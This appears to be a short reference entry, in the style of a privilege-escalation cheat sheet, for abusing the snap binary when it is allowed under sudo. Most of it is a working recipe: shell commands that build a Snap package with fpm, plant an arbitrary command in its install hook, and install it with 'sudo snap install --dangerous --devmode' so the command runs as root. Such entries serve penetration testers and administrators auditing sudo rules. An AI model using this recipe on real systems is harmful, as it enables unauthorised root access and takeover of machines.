If the binary is allowed to run as superuser by
sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
It runs commands using a specially crafted Snap package. Generate it with fpm and upload it to the target.
COMMAND=id cd $(mktemp -d) mkdir -p meta/hooks printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install chmod +x meta/hooks/install fpm -n xxxx -s dir -t snap -a all meta
sudo snap install xxxx_1.0_all.snap --dangerous --devmode